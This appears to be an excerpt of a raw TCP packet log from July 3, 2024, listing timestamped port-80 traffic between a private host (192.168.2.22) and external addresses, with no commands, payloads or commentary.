                        Jul 3, 2024 18:03:41.692562103 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.692608118 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.701375008 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.701386929 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.701399088 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.701426029 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.701502085 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.701514006 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.701550961 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.701724052 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.701771975 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.701813936 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.851680040 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.851718903 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.851731062 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.851865053 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.851941109 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.851979971 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.852055073 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.852338076 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.852379084 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.852384090 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.852397919 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.852426052 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.852627993 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.852642059 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.852683067 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.853069067 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.853135109 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.853144884 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.853178978 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.853318930 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.853329897 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.853353024 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.853765965 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.853802919 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.853832960 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.853842974 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.853873014 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.853996992 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.854007959 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.854046106 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.854621887 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.854705095 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.854716063 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.854738951 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.854849100 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.854860067 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.854882002 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.855535030 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.855576992 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.855598927 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.855611086 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.855640888 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.855865955 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.855878115 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.855909109 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.856350899 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.009648085 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.009727001 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.009815931 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.009924889 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.009963036 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.010026932 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010040998 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010063887 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010073900 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.010133982 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010145903 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010183096 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.010298967 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010355949 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010366917 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010396957 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.010596037 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010607958 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010620117 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010629892 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.010642052 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.010663033 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.089337111 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.089356899 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.089370012 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.089432955 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.089435101 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.089447021 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.089505911 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.169186115 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.169204950 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.169217110 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.169256926 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.169306040 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.169323921 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.169337034 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.169358015 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.169378042 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.248472929 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.248497963 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.248512030 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.248531103 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.248542070 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.248550892 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.248604059 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.248676062 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.248687983 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.248698950 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.248727083 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.257667065 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.257721901 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.321330070 CEST4916980192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:42.328247070 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.328265905 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.328279972 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.328329086 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.328342915 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.328346014 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.328355074 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.328366995 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.328411102 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.328411102 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.328636885 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.328649998 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.328695059 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.718674898 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.718699932 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.718712091 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.718729019 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.718741894 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.718843937 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.719402075 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.720103025 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.720158100 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.798933029 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.798952103 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.798964977 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.799011946 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.799017906 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.799032927 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.799046040 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.799061060 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.799086094 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.878643990 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.878659964 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.878670931 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.878844023 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.879352093 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.879364014 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.879374027 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.879385948 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.879401922 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.879422903 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.887356043 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.974803925 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.974822998 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.974834919 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.974905014 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.974932909 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.975367069 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:42.975506067 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:42.975730896 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134011984 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134032011 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134044886 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134111881 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.134397030 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134408951 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134421110 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134433031 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134459019 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.134476900 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.134526968 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134538889 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134550095 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134578943 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.134674072 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134691000 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134702921 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.134718895 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.134744883 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.213320971 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.213336945 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.213349104 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.213412046 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.213459969 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.213469982 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.213514090 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.215657949 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.215773106 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.215818882 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.292622089 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.292678118 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.292707920 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.292759895 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.292762041 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.292793036 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.292799950 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.292829990 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.293113947 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.293160915 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.293199062 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.372402906 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.372442007 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.372457981 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.372515917 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.372539997 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.372550964 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.372561932 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.372575045 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.372590065 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.372601032 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.372616053 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.372787952 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.381105900 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.381166935 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.452841043 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.452867031 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.452878952 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.452925920 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.453000069 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.453041077 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.453192949 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.453206062 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.453233004 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.453353882 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.453370094 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.453398943 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.461013079 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.532651901 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.532701015 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.532713890 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.532732964 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.532748938 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.532748938 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.532784939 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.532846928 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.532895088 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.532907963 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.532941103 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.533029079 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.533040047 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.533077002 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.905383110 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.905417919 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.905428886 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.905508995 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.905520916 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.905523062 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.905625105 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.905632019 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.905663013 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.905723095 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.985229969 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.985290051 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.985318899 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.985344887 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.985346079 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.985374928 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.985403061 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:43.985408068 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.985436916 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:43.985456944 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.065012932 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.065104961 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.065140009 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.065164089 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.065172911 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.065207005 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.065242052 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.065275908 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.065275908 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.065279007 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.065337896 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.073807955 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.144207001 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.144228935 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.144242048 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.144264936 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.144293070 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.144300938 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.144305944 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.144350052 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.144428015 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.144439936 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.144484043 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.144536972 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.144548893 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.144586086 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.231517076 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.231589079 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.231625080 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.231647015 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.231659889 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.231694937 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.231707096 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.231729031 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.231765985 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.231775045 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.231862068 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.231897116 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.231914997 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.310709000 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.310766935 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.310770035 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.310801029 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.310843945 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.310996056 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.311031103 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.311079025 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.311083078 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.311116934 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.311150074 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.311152935 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.311263084 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.311295033 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.311304092 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.390590906 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.390652895 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.390716076 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.390749931 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.390765905 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.390765905 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.390786886 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.390821934 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.390837908 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.390877008 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.390914917 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.390984058 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.391019106 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.391076088 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.708323002 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.708343029 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.708354950 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.708408117 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.708419085 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.708496094 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.708544970 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.708556890 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.708574057 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.708597898 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.708862066 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.709005117 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.709013939 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.709024906 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.709050894 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.709146023 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.709156990 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.709166050 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.709192991 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.709691048 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.709734917 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:44.787997007 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.788016081 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.788033962 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:44.788063049 CEST4917180192.168.2.2291.92.254.194
